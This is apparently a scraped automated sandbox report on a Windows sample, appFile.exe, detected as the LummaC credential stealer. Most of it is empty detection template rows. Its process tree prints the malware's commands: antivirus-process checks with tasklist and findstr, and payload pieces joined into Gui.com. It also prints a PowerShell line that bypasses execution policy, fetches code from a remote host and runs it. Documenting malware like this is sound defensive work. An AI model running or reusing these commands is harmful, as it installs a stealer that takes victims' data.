Windows
Analysis Report
appFile.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- appFile.exe (PID: 6556 cmdline:
"C:\Users\ user\Deskt op\appFile .exe" MD5: 8E9470197062CC090F733B985F2DE5D4) - cmd.exe (PID: 3716 cmdline:
"C:\Window s\System32 \cmd.exe" /c move Ip s Ips.cmd & Ips.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1876 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 6528 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 6504 cmdline:
findstr /I "opssvc w rsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 3192 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 1268 cmdline:
findstr "A vastUI AVG UI bdservi cehost nsW scSvc ekrn SophosHea lth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 4396 cmdline:
cmd /c md 473587 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - extrac32.exe (PID: 1568 cmdline:
extrac32 / Y /E Metal lic MD5: 9472AAB6390E4F1431BAA912FCFF9707) - findstr.exe (PID: 1276 cmdline:
findstr /V "BELIZE" Perception MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 5960 cmdline:
cmd /c cop y /b 47358 7\Gui.com + Contribu tions + Wa + Indones ian + Debu t + Sharew are + Jd + Membrane + Continen t + Sailin g 473587\G ui.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 1532 cmdline:
cmd /c cop y /b ..\Fr uit + ..\S cottish + ..\Encodin g + ..\Cle an + ..\Ci vil + ..\D ocumentati on + ..\Ac tivation M MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - Gui.com (PID: 1476 cmdline:
Gui.com M MD5: 62D09F076E6E0240548C2F837536A46A) - powershell.exe (PID: 4836 cmdline:
powershell -exec byp ass [Net.s ervicepOIN TmANaGer]: :SEcURiTyP rOtoCOl = [Net.SecUr iTyprOtoco ltYPe]::tL s12; $gD=' https://df gh.online/ invoker.ph p?compName ='+$env:co mputername ; $pTSr = iWr -uRi $ gD -uSebAS IcpARsiNg -UsErAGent 'Mozilla/ 5.0 (Windo ws NT 10.0 ; Win64; x 64) AppleW ebKit/57.3 6 (KHTML, like Gecko ) Chrome/1 2.0.0.0 Sa fari/57.36 '; IEx $Pt sr.Content ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5084 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - choice.exe (PID: 5948 cmdline:
choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:25.959763+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 104.102.49.254 | 443 | TCP |
2025-01-10T11:16:27.062353+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49727 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:28.020397+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49735 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:29.137473+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49741 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:30.323006+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49752 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:31.714083+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49763 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:32.933220+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49769 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:33.895581+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49778 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:34.935320+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49786 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:36.300749+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49792 | 185.161.251.21 | 443 | TCP |
2025-01-10T11:16:37.449554+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49803 | 104.21.15.122 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:27.522209+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49727 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:28.498428+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 104.21.80.1 | 443 | TCP |
2025-01-10T11:16:35.444353+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49786 | 104.21.80.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:27.522209+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49727 | 104.21.80.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:28.498428+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 104.21.80.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:25.238549+0100 | 2059035 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 52244 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:25.270926+0100 | 2059037 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 52928 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:25.248968+0100 | 2059039 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 64838 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:25.150626+0100 | 2059041 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 58510 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:25.282334+0100 | 2059043 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 54789 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:25.293212+0100 | 2059049 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56194 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:25.140782+0100 | 2059051 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57712 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:25.260066+0100 | 2059057 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 53648 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:33.383735+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49769 | 104.21.80.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T11:16:26.473215+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49716 | 104.102.49.254 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_004062D5 | |
Source: | Code function: | 0_2_00402E18 | |
Source: | Code function: | 0_2_00406C9B |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | File created: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | Binary string: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_004050CD |
Source: | Code function: | 0_2_004044A5 |
Source: | Code function: | 0_2_00403883 |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Code function: | 0_2_0040497C | |
Source: | Code function: | 0_2_00406ED2 | |
Source: | Code function: | 0_2_004074BB |
Source: | Dropped File: |
Source: | Code function: |
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: | 0_2_004044A5 |
Source: | Code function: | 0_2_004024FB |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
